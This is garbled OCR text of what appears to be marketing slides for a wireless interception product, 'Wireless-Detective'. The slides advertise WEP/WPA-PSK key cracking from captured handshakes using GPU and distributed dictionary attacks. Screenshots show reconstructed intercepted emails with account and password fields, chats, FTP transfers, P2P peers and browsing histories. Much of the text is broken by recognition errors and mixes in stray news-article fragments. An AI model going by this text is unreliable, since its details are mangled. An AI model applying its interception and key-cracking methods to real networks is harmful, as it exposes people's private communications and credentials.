9e SKYPE (3) 1| © | Manual |: 00:24:56:00:24:56 | 6 | 54 | wep? 

#-G\GOOGLETALK (1) PE = | ie 
2| © | Manual | 00:23:51:00:24:56 | 6 | 54 | WEP [153 2487 0 WIRE 0 |Blockin 

sec i |Manual | [1234567890 | %87 g 


cking 


+ 1 | 

@} FTP (22) i Sup 

i 3| © | Manual |# 00:1E:58:00:24: 7 | 54 WEP 0 1240 OT 0 "Bloch 

+ pp (13) $ 00:24:56 z. locking 

*-AGAME (3 r= - - [— — = 

E . (1322) 4 | € Manual |: 00:1E:58:00:1E:58 | 3 | 54 WEP 1 1649 10 sai 0 Blocking 

+ @ HTTP (CONTENT) (. — 5| © | Manual |: 00:1D:7E:00:1E:58 | 1 | 48 WPA 22 8692 63 ye 1 |Blocking 

P HTTP (DOWNLOAC — ç | © | Manual | e 00:1B:5B:00:1E:58| 2 | 54 | wep? 6 1164 (mp 1 |Blocking 

+- q HTTP (RECONSTRI — 

xSfvinEo STREAM (35 7| © | Manual |: 00:1B:5B:00:1E:58| 6 | 54 | WEP Ë 27 8116 0 2WIRE 0 | Blocking 

TEN TELNET (44) 8| © | Manual |# 00:1B:5B:00:1E:58| 6 | 54 | WEP 4 395 0 2Wl 0 |Blocking 

SEARCH | 

i be 9 © | Manual |# 00:1A:C4: 00:1A:C4| 6 | 54 WEP 4 1147 35 2W 0 Blockin 
@ ALERT - | Manual | 2 

* assu | , 10| © | Manual |: 00:19:E4: 00-1A:C4 | 6 | 54 WEP 4 1562 3 2WIRE9 0 [Blocking 


Search ^ K«12»» Count: 15, Total : 2, In page 1| Rows per paqe : 10 | Submit Update 


Wireless-Detective — WPA-PSK Cracking Sol. 


Router Firewall J 
Ü ow Wireless-Detective 


gU x ae (Slave) 
f Qe E p WPA-PSK Cracking 
i ' d D 
n Ac VB ` Solution 
x "d ` u \ 
" X - E Kä "— WPA Handshake packets 
RO AN RE EO ' need to be captured for 
E i, 1 i > i i cracking WPA key. 
» 7 WX. d | n -—-- d Utilize Single Server or 
! - Distributed S (multipl 
Wireless-Detective Wireless-Detective Eales Servers i 
(Slave) Í (Slave) smart password list attack 
` 
- Wireless STA Wireless-Detective simultaneously) to crack WPA 
——— sm» Central Management k 
(Master) ey. 
Implementation of Single or Distributed Servers Acceleration technology: GPU 
Acceleration 


D D t D D D t D D D Raw data packets containing 
handshakes packets 


Distributed Password List/Dictionary Cracking 
Using GPU Accelerated for WPA-PSK or WPA2-PSK Key Cracking 


Note: WPA handshakes packet can be captured by Standalone Wireless-Detective system or Distributed Wireless- 
Detective systems. 
This is an optional feature! Additional system is required! Please contact Decision Group for more information. 


Wireless-Detective — WPA-PSK Cracking Sol. (3) 


4% Elcomsoft Wireless Security Auditor 
File Action Options Help 


& 8 B N MR fa 


Import s Create Open M Save Start Pause Check for Help 
data project project project attack attack updates contents 


Dictonaries total 1 Dictionaries left: 0 

Time elapsed: Oy Od Oh:0m:4s Time left: Oy id 1h:5m:25s 

Current speed: 507 Average speed: 419 

Last password: 0660 Processor load: 100% 
english. dic - 0% 


Password 


This is an optional feature! Additional system is required! 
Please contact Decision Group for more information. 


ry m 


Time stamp Message 


10:22:35 March 07, 2010 english.dic has been opened successfully 
10:22:35 March 07, 2010 About to start new recovery: 2 CPU core(s), 0 GPU card(s) 


10:22:36 March 07, 2010 Recovery: started 


cuckoo 


Reconstruction — Sample Email — POP3 


e https://192.168.10.60/main.php - Windows Internet Explorer ` -— ell 


OU - emgeet 


File Edit View Favorites 


Y EJ UL S aem Y Page v Safety v Tools v e- d 


dir Favorites | @ https://192.168.10.60/main.php Ze 


POP3 (66) | NO. @ DATE / TIMEt ACCOUNT PASSWORD 
8492 168.1.9 (9) 
Bue 168.110 (11) | | Al. posten iniwurmp@bos... AER NONE 4 Update your Penis supportQ... eddecisi... 
8492 168.1.11 (30) | 
E492 168 1.33 (14) | pee dakota4824(9)].. "— NONE + Dont put your health at stake! support()... eddecisi... 
8192 168.1.142 
| ESM Hts | 23. TE iessiedoli@l... SUPPT@et NONE — | Free Yourself Today! supportQ... eddecisi... 
El -07- 3 
H ‘Ba IMAP (14) | 24. pe gandong2004@ ae NONE + Only the Beginning support)... eddecisi... 
Za WEBMAIL (READ) |= 
e I Edegem Vd HOHE i H supportQed-system sg Keep Styli supportQ... eddecisi 
| S hetp=1//192.168 10.60/appsn/em\/I/indexhtm)- Windows internet Explorer San) j support@ed-system.sg Keep Stylis pport(Q... --- 
BO - | | https://192.168,10.60/ 2p ind icate Error | keck) D Crowler Search Pe SR 
— = m —— EET - = NONE 4 Staff Placement support@... eddecisi... 
si Favorites f https://192.168.10.60/appsrv/emI/1 /index.html fi E) + & dm v Pager Safetyy Tools > E: 


NONE +4 RE: Dear support@ed-system.sg 82% OF... support)... eddecisi... 


Subject Brazil's new drunken driving law stirs discontent 
H From fransyinmy@yahoo.com: Es A CAS 
To es pupport@... + Brazil's new drunken driving law sti... support()... eddecisi... 
cc support@ed-system sg; 
BCC 4| NON Africa support)... eddecisi... 
2008-07-02 10:24:04.0 
NE F XR NONE 4 UN finds world economic insecurity a supportQ)... eddecisi... 


192.168.1.11 
008-07-01 1924:04.0 


ount : 30, Total: 2 , In page 2| Rows per page: 20 [ Submit ] 


| BRASILIA - POLICE have arrested hundreds of Brazilian drivers under a tough ne 
||| are working to overturn the measure and many of their clients are flouting it 


m= driving, but bar owners 


1 i most European countries, 


Brazil has some of the world's most dangerous roads, with 7 deaths per 10,000 cart 
according to the Brazilian Association of Traffic Medicine. 


An estimated 45 per cent of those 36,000 annual deaths are due to drinking, the grd 


The law, which took effect on June 20, effectively bars drivers from drinking and inj Na the new limit of 0.2 


decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. 


Violators face at least a USS600 (S$818) fine, a one-year suspension of driving pri 


Heavy drinkers can be imprisoned. 


| In 10 davs federal police. who monitors the country's main hishwavs. have arrested some 300 motorists and fined manv more even though experts sav thev are 7 & Internet | Protected Mode: Off fa v 100% e 
| @ Internet | Protected Mode: Off fa > 100% ~ — — 


Reconstruction — Sample Email — SMTP 


f https://192.168.10.60/main.php - Windows Internet Explorer 


OO- ERES 


v [-] æ v Pages Safety» Tools v @- ; 


= = sé? 


D ~| 


File Edit View Favorites Tools Help 
dir Favorites | @ https://192.168.10.60/main.php Ze 
[B menu ^ CATEGORY : SMTP - 192.168.1.11 
|| 
! "7 d POP3 (66) NO. ü DATE / TIME* FROM TO cc BCC 
|< SMTP (19) 07. 
ieee 1.0 ET decision@ed-... decision@ed-.. suppot@.. ^ NONE 
E192 168.1.10 (5 -07- 
8492 168.1 11 z 2 0 peg decision@ed-... decision@ed-... NONE NONE 
ll B | -| 
| Seiren ty 3 6 porem decisionged-.. supported-s.. NONE NONE 
| Ga IMAP (14) w“ 1»» Count : 3, Total : 1, Ing 
| Sa WEBMAIL (READ) |= 
t Es wep € "esso sppsrv/eml/A/indexhtmi - Windows Internet Explorer —, kale? 
; @ E pr E | P «| 
| T ^ MSN || Ele Edit View Favorites Tools Help 
| + SS ICQ ( di Favorites f https://192.168.10.60/appsrv/emI/4/index.html Gë: >) + me v Pagev Safetyy Tools v @~ 
| 530 Yandi sawaman d 
| o e QQ (1| From decision@ed-system sg: 
i To support@ed-system sg; 
| UT UT (1| ge == 
SS SKYE ree 
#S'GOOG = 
+-|RORc (2 | 
H o E FTP Nt 
d *- g Pap ( 
| + d GAME Ex-con suspected of killing 8 captured . ) 
E ë HTTP GRANITE CITY (Illinois) - AUTHORITIES say they have captured an ex-convict 
SR Lieutenant Bill Baker of the St Louis Area Major Case Squad says twenty-eight-ye ES City, Illinois 
(+) @ HTTP | about 16 kilometers north of St Louis, Missouri. He did not immediately have more|| 
+ » | HTTP a spokeswoman with the Granite City police department says Sheley is in custody Qi yasma Pretend Mode ON mm 
EN HTTP The FBI launched a manhunt for Sheley, who they believe is tied to the killings of eight people in Illinois and Missouri, including a 93-year-old man, a child, and a 
: r 1) couple whose blood-soaked dogs were found roaming a motel parking lot. = 
4 n 
| — Police in Galesburg. in northwestern Illinois, had ealier said that they had a warrant for Sheley?s arrest on charges including first-degree murder, aggravated 
s € aep re dicirur qas in the c: irn Randall, whose body was found Monday behind a Galesburg grocery store. An autopsy shows the 65- 
year- 'om force trauma to the head. 
Officials said the other victims all appeared to have died in the same manner. = 
— Done @ Internet | Protected Mode: Off fü v 100% v 


SUBJECT 
1 MY Email 
+ New York 


+ Captured 
ge 1| Rows per page : 


SIZE 


93.5K 


TT.9K 


97.3K 


20 [ Submit ] 


otected Mode: Off 


Reconstruction — Sample Email — IMAP 


| File Edit View Favorites 

wy Favorites = https://192.168.10.60/main.php d is ~ 5 dm v Pager Safety» Tools v Gv 
| B MENU ^ CATEGORY : IMAP - 192.168.1.10 
* $> POPS (66) NO. 8 DATE/TIME) FROM ACCOUNT PASSWOR 


= e IMAP (14) 21 satay dey iniwurmp@bos suppot gae: NONE 4 Update your Penis support@... eddecisi 
š Fe on ! vie, 2 pe P dakota4824@j... 9"PP9Ged- ` NONE — | Dont put your health at stake! support@... eddecisi 
* (£3 WEBMAIL (SENT) ( 123. S. jessiedoigi..  SUPPOO*Ó — NONE — | Free Yourself Today! suppot@... eddecisi... 
š MSN (18 : 
+ KO e | 24 pert gandong2004 "iil NONE 4 Only the Beginning suppot@... eddecisi 
I v Yoo Y 2006-07-02 support@ed-s NONE i frj support@ed-system.sg Keep Stylis suppot@... eddecisi 
NONE 4 Staff Placement suppot@... eddecisi 


sip Favorites 


E https://192168.10.60/appsrv/eml/1/index-html = ge v Pager Step: Tool v SG: 


NONE i BE Dear support@ed-system.sg 82% OF... support@... eddecisi.. 
uppon@... + Brazil's new drunken driving law sti support)... eddecisi 


NONE suppot@... eddecisi. 


2008-07-02 10:24:04.0 


NONE 4 UN finds world economic insecurity a suppot@... eddecisi 


192.168.1.11 
008-07-01 1924:04.0 


ount : 30, Total : 2, In page 2| Rows per page : 20 | Submit 


m driving, but bar owners 


1 i most European countries, 


| BRASILIA - POLICE have arrested hundreds of Brazilian drivers under a tough ge 
are working to overturn the measure and many of their clients are flouting it. 


Brazil has some of the world's most dangerous roads, with 7 deaths per 10.000 cart 
according to the Brazilian Association of Traffic Medicine. 


An estimated 45 per cent of those 36,000 annual deaths are due to drinking, the grd 


The law, which took effect on June 20, effectively bars drivers from drinking and inj la the new limit of 0.2 


decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. 


Violators face at least a USS600 (S$818) fine, a one-year suspension of driving pri 


Heavy drinkers can be imprisoned. 


| In 10 davs federal police. who monitors the countrv's main hishwavs. have arrested some 300 motorists and fined manv more even though experts sav thev are — 7 
@ Internet | Protected Mode: Off fv 100% >v 


Reconstruction — Sample Web Mail (Read 


https://192.168.1.60/main.php - Windows Internet Explorer 
e» € | Ë | httpsi/192.168.1.60/main.php 
File Edit View Favorites Tools Help 


Ve dEr |@httpsij92.168.1.e0Jmain.php w 


Kä MENU fer ES - 
a NO. DATE / TIME: 
| 8192 168.1.103 (15; 4 — 
Zei SMTP (2) š 

B.492 168 1 103 (2) 2. 2008-03-02 13:52:11 
ës IMAP() - 3 2008-03-02 13:47:59 


2008-03-02 13:47:32 
2008-03-02 13:47:32 
2008-03-02 13:47:08 
2008-03-02 13:47:08 


>” WEBMAIL (READ) - 
8492 168.1.103 (11: 
WEBMAIL (SENT) ( 6. 


Aa MSN (11) 


+ - 
a Ica (0) 8. 2008-03-02 13:47:08 
Ae YAHOO (5) 9. 2008-03-02 13:45:16 
“B00 (0) 10. 2008-03-02 13:44:26 
um n 2008-03-02 13:43:40 
wn SKYPE (0) supi 
arm 
e gË, pop (2) 

ASSAME (0) 


=- HTTP (LINK) (1500) 
#1: HTTP (CONTENT) ( 
“3qj HTTP (DOWNLOAL 
wi HTTP (RECONSTRI 
H- TELNET (3) 


--R]- 


o SEARCH 

e ALERT 

"fà EXPORT 

&-i MANAGE 3 

JE > 
Search 4 


URL 


+ L] Please open record file 
+ [3 Please open record file 
LH Please open record file 
+ F] Please open record file! 
Li Please open record file 
Li Please open record file 
+) Please open record file 

WEBMAIL(READ) | IP : 192.168.1.103 | DA1. / TIME : 2008-03-02 13:47:08 


do yee G Tos > O- š ü H @ 3 


- Windows Internet Explorer 


EI 


FROM :bobierbonier@gmail.com 
DATE / TIME :2008-03-02 13:47:08 
TO :wedetective1@yahoo.com 
CC :wedetective2@yahoo.com 
SUBJECT :U N. chief condemns Israel after bloody day in Gaza 


UN. chief condemns Israel after bloody day in Gaza 


By Nidal al-Mughrabi 


Islamist militants to stop firing rockets. 


Wednesday. 


javascript: ChangeSort('_HOST','ASC’); 


Addressing an emergency session of the Security Council in New York after four days of fighting [mg 
in which 96 Palestinians have been killed, many of them civilians, Ban also called on Gaza's 


But with public anger boiling in Israel, there was no sign the government was ready to call off an offensive that took troops 
` DE? Ce: DÉI "fiio CER E MUT REI d do go es - 


GAZA (Reuters) - U.N. Secretary-General Ban Ki-moon condemned Israel for using "excessive" force in the Gaza Strip 
and demanded a halt to its offensive after troops killed 61 people on the bloodiest day for Palestinians since the 1980s. 


Smoke rise after an 
Israeli missile strike on 


The 1.5 million Palestinians crammed into the blockaded, 45 km (30-mile) sliver of coast, enjoyed a house in Gaza March 
a relative respite early on Sunday from Israeli air strikes and raids. Two Israeli soldiers diedina 1, 2008. 
ground assault on Saturday. An Israeli civilian was killed by a rocket in a border town on 


(REUTERS Stringer) 


"While recognising Israel's right to defend itself, I condemn the disproportionate and excessive use of force that has killed 
and injured so many civilians, including children ... I call on Israel to cease such attacks," said Ban. 


"I condemn Palestinian rocket attacks and call for the immediate cessation of such acts of terrorism," he said. 


` ^ar vi 


A Done 


@ Internet. R100% + 


- » > 
me + |: Page ~ iG} Tools + 


Windows Live 
YAHOO2.0 Mail 
YAHOO2.0 Mail 
YAH002 0 Mail 
YAHOO2.0 Mail 
YAHOO2.0 Mail 
YAH002 0 Mail 
YAHOO Mail 
YAHOO Mail 
GMail 


= 20 


ka Internet 


* 1000 + . 


Reconstruction — Sample Web Mail (Sent) 


e https://192.168.10.60/main.php - Windows Internet Explorer ` -— 


Qu £ https//1921681050/mainphp = 
File Edit View F. 


ly Favorites e | Date/Time, Form, To, CC, BCC, Subject, Webmail Type |... ,.. 


| E menu ^ bf ORY - WEBMAILS . 192,168 


| F ®& POP3 (66) 0.8 DATE / TIME FROM TO cc BCC SUBJECT Weg 
| ES SMTP (19) 2008-07-02 
| it dëi IMAP (14) i Ë 02-28-17 frankie deci... decision@ed-... NONE NONE 4 M Bush GMail 
H WEBMAIL (READ) : -07- G i 
a> (READ) | 5 o 20080702 deci.  support@ed-s.. NONE NONE + “UN finds world economic GMail 
= EM 02:27:24 Ins 
Bun 168.1.9 (3) See wedetective2... support@ed-s. NONE NONE Africa Wee 
8492 168.1.10 (13) i 
B192168.1.11(5) | 2/4. 0 224622 — wedetective2.. fankie dei NONE — Led T 
892 168.88 125-477 gold r. ve 
| E Bs MSN (18) 5. d LESE strike gold at lrish vano: 0 
| E ICQ (7) 
| Lei B YAHOO (22) Walt FROM :frankie decision@gmail.com s In page 1 | Rows per page : 10 
B DATE / TIME :2008-07-02 02:27:24 
d I e QQ (10) TO :support@ed-system.sg 
= BSECT-UN finds WOIteean 
d UT d o) ATTACHMENT | 1. SIA jpg 
S vn SKYPE (3) 
| A E ALK (1) . Rm H and poor nations have more in common this year d 
EHRUIRC (2 
t Wd ( ) Their shared anxiety is largely due to 'trade shocks' from rising oil and food pric 
i E FTP (22) financial markets. natural disasters and armed conflicts. the UN said in its annual 
H m g p2P (13) economic and social trends, released on Tuesday. 
I + ¿BSAME (3) As usual, though, it's the impoverished who fare worse. 
+ EI HTTP (LINK) (1322) "The food riots that broke out in a number of countries in early 2008 have kidol 
economic livelihoods for those at the bottom of the development ladder.’ the reg) ! 


sé HTTP (CONTENT) ( 
«3i HTTP (DOWNLOAC 
a) HTTP (RECONSTRI 
2S yipEo STREAM (35 ~ 


n" | D 


© intenet Protected Mode: OFF 
Mr Sha Zukang. the U.N. undersecretary-general for economic and social affairs, suggests 
nothing less than 'a global New Deal’ or Marshall Plan-like approach to help the world's poor, 
especially the 1 billion people who live on less than USS1 (S$1.36) a day. 


Ji: 


Under that plan, nations would set aside cash grants that nations could pay to each household, 
something along the lines of the dividends paid to Alaskans each year since 1980 from oil and gas 
money. 


—— amm — — 
Si 


| Search 4 


"Such measures are, of course, fraught with complications and difficulties,’ he says in the report. = 


Done @ Internet | Protected Mode: Off fg v ®100% + 


Reconstruction — Sample IM/Chat — MSN 


r 


https://192.168.10.60/main.p 


File Edit View Favorites 
sip Favorites 
E MENU = 
+- POP3 (66) 

ei SMTP (19) 

zën IMAP (14) 

Sa WEBMAIL (READ) | 


ei 


8.192 168.1.9 (4) 
8492 168.1.10 (6) 
8492 168.1.11 (2) 
8192 168.1.13 (2) 
8192 168.1.33 (3) 
E192 168.1.142 


itd 
5-w9 YAHOO (22) 

A QQ (10) 

S JT UT (1) 

+- SKYPE (3) ` 
+-SMGOOGLETALK (1) 
#-{PCIRC (2) 

H- FTP (22) 

+- gË pap (13) 

+ A GAME (3) 

@ HTTP (LINK) (1322) 
@ HTTP (CONTENT) ( 
$434 HTTP (DOWNLOAE _ 


Search 4 


f https://192.1 


iter net Explorer 


p - Windo 


2 e 2$ É Crawler Search 


CATEGORY : MSN - 192.168.1.11 


DATE / TIMEt PARTICIPANTS CONVERSATION COUNTS 

1. 0 2008-07-02 02:43:23 wedetective2@hotmail.com wedetective@hotmail.com 9 
2 d 2008-06-02 11:27:18 wedetective2@hotmail.com wedetective@hotmail.com 10 
Wal pm Count : 2, Total : 1,In page 1 | Rows per page : 10 | Submit | 


MSN [IP : 192.168.111 | DA 

. DATE / TIME SCREEN NAME FILE NAME SIZE 
1 pee wedetective2@hotmail.com MSN helo 
2. oe wedetective2@hotmail.com MSN howru? 

2008-06-02 - 4 P š 
3 112742 wedetective2@hotmail.com © 439.8K MSN 2008-06-02 11:27:42 ~ 2008-06-02 11:28:16 
4 Ona wedetective@hotmail.com MSN thank you 
5. SE wedetective2@hotmail.com MSN alright.. 
6. e wedetective@hotmail.com MSN okie. 
de preso wedetective@hotmail.com MSN thank you 
8. SE wedetective2@hotmail.com MSN welcome 
9. Krees wedetective2@hotmail.com MSN kk 
10 ese wedetective2@hotmail.com MSN bye 
TEET Count: 10, Total : 1 , In page 1 | Rows per page : 10 [Submit | - 
| Done @ internet | Protected Mode: Off fg v @%10% e 


Including Text Chat Messages, File Transfer and 
Webcam sessions reconstruction and playback. 
Supports Client and Web MSN. 


@ Internet | Protected Mode: Off fg v. R10% 


Reconstruction — Sample IM/Chat — Yahoo 


https://192.168.1.60/main.php - Windows Internet Explorer 


eO: ; ~ Ë https:{/192, 168. 1.60/main.php v | (el Certificate Error 23 | X Dis 


File Edit View Favorites Tools Help 


» 
EI Ei {Æ https://192.168.1.60/main.php Tools ~ 


^| CATEGORY ` YAHOO _ 192.168.1.17 / ~/ 


& MSN (11) 
B492 168.1.103 (1 NO. 0 DATE / TIME: SCREEN NAME PARTICIPANTS CONVERSATION ` COUNTS 
(1) 
heeds e 1 0 2006-10-21 03:17:39 tom-0102 math_824 CONVERSATION 8 
Hi19?168153(j — Wq ih Count: 1, Total: 1 , In page 1J/Cows per page: 20 


8492 168.1.57 (1) 


7^ YAHOO | IP:192.168.1.17 | DATE/ TIME: 2006-10-21 03:17:39 - Windows Internet Explorer 


YAHOO (5) Æ | https://192.168.1.60/yahoo]yahoo msg.php?IDX-38DATE-2006-10-21952003:17:3980WNER--tom-01028WHOM- math 82481P-192.168.1.17 wf Certificate Error 
E492 168.1.103 (2) x= 
B492 168.1.17 (1) 
NO. DATE/TIME SCREEN NAME TYPE MESSAGE STARTTIME ` END TIME 
8492 168.153 (1) 2006-10-21 ST 
SE tom-0102 MESSAGE 
` 2006-10-21 
É > 03:18:20 mam net 
yr UTM 2008-03-03 2006-10-21 2006-10-21 
L3 SKYPE (0) 16:32:54 math 824 03:17:28 03:19:38 
Ei 2008-03-03 "T 2006-10-21 2006-10-21 
ER FTP (8) 16:32:54 dee 03:17:22 03:19:39 
I 2008-03-03 2006-10-21 2006-10-21 
&- g P2P (2) 16:32:54 math 824 03:20:13 03:21:16 
ABSGAME (0) 2008-03-03 uem 2006-10-21 2006-10-21 
o 16:32:54 - 03:20:13 03:21:16 
1 gu st ch rile 2008-03-03 wam 2006-10-21 2006-10-21 
3 g$ HTTP (CONTENT) ( ; 16:32:55 x 03:28:50 03:29:24 
2008-03-03 2006-10-21 2006-10-21 
Ed "Sij HTTP (DOWNLOAC ` 46:32:55 abet 03:28:50 03:29:24 
H- gj HTTP (RECONSTRI 4 1 Count: 8, Total:1,Inpage 1|Rowsperpage: 20 
5-3 TELNET (3) 
@, SEARCH " x 
e ALERT Including Text Chat Messages, File 
(y EXPORT : 
anna d Transfer, VOIP and Webcam sessions 


(V REGISTER — v reconstruction and playback 
Search a Supports Client and Web Yahoo. 


* 1009 v 


@ Internet 100% + 


Reconstruction — Sample File Transfer - FTP 


GO- Emen 


ei https//192.168.10.60/main.php - Windows Internet Explorer | 


| &-S'GOOGLETALK (1) 
Nu 


File 


sip Favorites 


Edit View Favorites 


Æ https;//19 


+- SKYPE (3) 


Ce 
P (22) 
8192 168.1.10 (9) 


3: 


8492 168.1.11 (4) 2. 
2492 168.1.33 (9 
$ E 3. 
+ A GAME (3) 
a- HTTP (LINK) (1222) | ^ 
*-G HTTP (CONTENT) (| | aa 4 


3-34 HTTP (DOWNLOAC 
a) HTTP (RECONSTRI 
$9 yipEo STREAM (35| _ 
EB TELNET (44) 
o SEARCH 
^49 ALERT 
^f EXPORT 
7 mm MANAGE 

g WIRELESS 
ER BACKUP 
—89 SYSTEM 
X9 NETWORK USE 
$8 AUTHORITY SE 
| ^ DELETE DATA 
| SA EDIT PASSWOF ~ 


4 | Hu r 


on es 


Search 4 


NO. DATE / TIMEt 


ORY ~ FIP _ 19 D 


ACCOUNT 


SU 
02:36:22 
2008-07-02 
02:36:14 
2008-07-02 
02:35:58 


2008-07-02 
02:35:20 


anonymous IEUser@ 


anonymous IEUser@ 
anonymous IEUser@ 


anonymous IEUser@ 


Fee EE 


PASSWORD ACTION 


FTP SERVER FILE NAME 
DownLoad 64.7.210.151 [1 DWA-642 ds.pdf 
DownLoad 64.7.210.151 EJ DSN-320089 de pdf 
DownLoad 64.7.210.151 FJ DWA-140 fils. pdf 
DownLoad 647.210.151 EJ DWA-643 Ws. pdf 
Count : 4, Total: 1,In page 1 | Rows per - 8 [ Submit | 
IEEE oo -- $ | 


| Fie Edt GoTo Favorites Hep 
dip Favorites https://192.168.10.60/download php7FILE=/datas. 


O v fe caseo AMA MAIS 5 rp ARS © uf Cetate Eror | > | ^| ES 


i Do you want to open or save this file? 


"mO etes 


bas + E 


HE 


WHAT THIS PRODUCT DOES 


k — SECURITY 
` + WER Protected Access (WPA, WPA2/ 


LEDs 
+ tink 


+ Activity 


CERTIFICATIONS 
+ FOC Cass B. 
+ 


BENEFITS 


+ Easy to install and use with the inched Quick 
‘Adaptor Setup Waard 


YOUR NETWORK SETUP 


Done = == ES É i @ Unknown Zone | Protected Mode Off 


Name: FTP AASdSk.pdf 
Type: Adobe PDF Reader, 594KB 
From: 192.168.10.60 


DIMENSIONS 
«tom Wa Oeil 2 17x 47" x03" 
+ Packaging MADXE 65° x8" x14" 


WEIGHT 


en 01 bs 
+ Packaging: 05 Ibe 


WARRANTY 
Yer Lito? 


9 


save this file. What's the risk? 


While files from the Intemet can be useful, some files can potentially 
harm your computer. If you do not trust the source, do not open or 


@ Internet | Protected Mode: Off 


Reconstruction — Sample Peer to Peer — P2P 


lÆ https://192.168.10.60/main.php - Windows Internet Explorer 
| 99 YAHOO (22) ^ CATEGORY : P2P - 192.168.1.10 
H-A QQ (10) Send Receive 
j No.  DATE/TIME? TOOL FILENAME Last Activated Detail 
| ff UT (1) Throughput Throughput 
D vn SKYPE (3) 1 JET ` Foxy198.0 MARI Give Me 5 - . 2008-09-22 01:55:10 0B 1.2M Detail 
&-&'GOOGLETALK (1) 2008-09-22 = f 
&RàRc (2) 2. eeii Foxy 1980 EUER BR c. 2008-09-22 02:02:18 4.6M 0B Detail 
H-E FTP (22 -09- ! 
T (22) 3, 20080922 Foxy 1.9.8.0 VEER Give Me 5 - ... 2008-09-22 01:55:10 0B  — 604.6K Detail 
Euren 01:55:18 
192.168.1105) [N 4. perg LimeWire/4.16.6 Adobe DNG 3.0 Converter R... 2008-03-29 07:09:04 0B 20.8K Detail 
8192 168.1.11 (1) 
B192168.1.33 (2) 5, — 20090529 ` LimeWire/4 16 6 Top of Charts - 2005.wma 2008-03-29 07:09:04 0B ` 186.7K Detail 
| e 8192 168.1.142 : 
ER CAN Wal Rn Count: 5, Total: 1 , In page 1 | Rows per page: 
i @ HTTP (LINK) (1322) Te P2P | 192.168.110-Windowsintemet Fleeg SE E 
&- él HTTP (CONTENT) ( SUM 7 UTE 00x 8 55 crower Search 
qj HTTP (DOWNLOAD = File Edi View Favorites Tools Help l == I = 
& a) HTTP (RECONSTRI i xi Favorites | @ P2P | 192168.110 Mo OE) + 2 dé + Pager Sefety- Tools v QT ” 
| a VIDEO STREAM (35 = ILFN6Q7GHOSN2GNBGX35YB5HEOQ6A 
m.p» No. DATE/TIME ACTION PAP. PORT P-PORT Th hput 
1 TELNET (44) || t 2008-03-29 07:08:03 DOWNLOAD 97 96.149 28 57962 9887 92 TK 
Q. SEARCH 2: 2008-03-29 07:09:01 DOWNLOAD 96.242.169.106 57967 24653 40.0K 
i ae 2008-03-29 07:09:04 DOWNLOAD 98.210.122.244 57963 19419 441K 
@ ALERT 4. 2008-03-29 07:09:04 DOWNLOAD 68.151.212.254 57956 32106 16.0K 
| : EXPORT 5 2008-03-29 07:09:04 DOWNLOAD 70.53.66.69 57964 28488 28.1K 
i Lë 6. 2008-03-29 07:09:04 DOWNLOAD 64.233 237.87 57960 25873 228K 
| (+) 4a MANAGE r 2008-03-29 07:09:04 DOWNLOAD 65.92.159 214 57954 50663 27 AR 
E ü 8. 2008-03-29 07:09:04 DOWNLOAD 70.44.65.175 57958 17273 5.5K 
| A REGISTER ] Wal pn Count : 8, Total: 1,In page 1 | Rows per page: 20 | Submit | ~ 
| I C UPGRADE Done @ Internet | Protected Mode: Off fg > R10% > 
| Rx LOGOUT E ` 
aen ! Including Action (Download/Upload), Peer IP, Port, Peer 
| Search 4 Port & Throughput 
Q Internet | Protected Mode: Off fg ~ ®100% e 


Reconstruction — Sample HTTP — Reconstruct 


@ ° 
File Edit View Favorites Tools Help 
Ve Favorites @ https://192.168.10.60/main.php 
] ^ CATEGORY : HTTP(R 
+-¥3 YAHOO (22) 


| 548 20 (10) 2. —— Date-Timet HTTP Content 


S [T UT (1) 2008-07-02 02:44:18 EJ) http-//kaw.t.msn.com/en-sg/home.aspx 
+ 45 SKYPE (3) 2008-07-02 02:43:00 [I http://sg.insider.msg.yahoo.com/client_ad.php 


:-«&'GOOGLETALK (1) 2008-07-02 02:38:48 [M] http://digg.com/tools/diggt@ Dynamic Tb 107 Te TERM 


IA 
08:07:02 023742. Windows Internet Explorer chez 


https 1921681060 


File Edit View Favorites Tools Help 


g Favorites En > B) + Gl dm v Pager Safetyy Toos Q- 2 @ G @ H 23 HG 


K 


2008-07-02 02:38:34 (4 http://isohunt.com/torrentg 
2008-07-02 02:38:30 [EJ http://sg.insider.msg-yaho| 
2008-07-02 02:38:23 [M] http://sg.insider.msg-yaho| 
2008-07-02 02:38:21 (4 http://sg insider.msg.yaho| 
+ @® HTTP (LINK) (1322) 2008-07-02 02:37:55 [3 http://isohunt.com/torrentsf 
` @ HTTP (CONTENT) (127 2008-07-02 02:37:48 DI http://digg.com/tools/diggt! 
tS) HEED (: 10. 2008-07-02 02:37:47 [+ http://digg.com/tools/diggt 
: 2008-07-02 02:37 45 [E] http://digg-com/tools/diggtii YOU CAN NOW SEARCH SECURELY WITH ISOHUNT.COM 
12. 2008-07-02 02:37:44 4 http://digg.com/tools/diggt SE ES 
13. 2008-07-02 02:37:42 M] http://isohunt.com 

14. 2008-07-02 02:36:07 [+ http://www.dlink.com/prod 
15. 2008-07-02 02:36:02 [+ http://www.dlink.com/prod 
16. 2008-07-02 02:35:18 E http-//www.dlink.com/prod 
17. 2008-07-02 02:35:11 EJ http://www.dlink.com/prod 


2-|POIRC (2) 

arm (22) 
+- gP pap (13) 
+) A GAME (3) 


IP : 192.168.1.11 URL : http/isohuntcom DATE / TIME : 2008-07-02 02:37:42 
GSS | twitter updates " 


<< Paqe 1 of 40 (199 items) 2 3 4 5 


SSL now available for citizens of Dubai (and others)! 


Posted by SecretSquirrel on Jun. 25 


H co = > % > > ` = 


m 
— 
—- 


8492 168.1.9 (49) 
8492 168.1.10 (174) 
8492 168.1.11 (99) 
8492 168.1.13 (49) 
8492 168.1.33 (180) 
8.192 168.1.142 (107) 
i192 168.88.125 4 


ianks in no small part to the work of Spike, we are proud to offer SSL on 2 of our sites. https://isohunt.com 
https://torrentbox.com and https://forums.torrentbox.com are all now valid urls for reaching us. This should mean that 
folks in Dubai, who have recently had to start using an alternate domain of ours, should now be able to visit us directly. If 
you have issues with transparent proxies or mean people snooping on your connection, this should come as fantastic news 
for you. We'll be evaluating how much extra load this places on our servers over the next few weeks, and if there's a large 
outpouring of people preferring to browse isoHunt or TorrentBox securely, we'll be investing in some dedicated hardware to 
handle the SSL connections. ( Soekris vpn1401 's have hifn chips with some very nice linux kernel drivers for crypto 


offloading, so they'd make our SSL stuff faster, and be completely transparent ei) 


Just a heads up: we did in fact buy certificates, but loading some pages may cause warnings due to ads and digg not being 
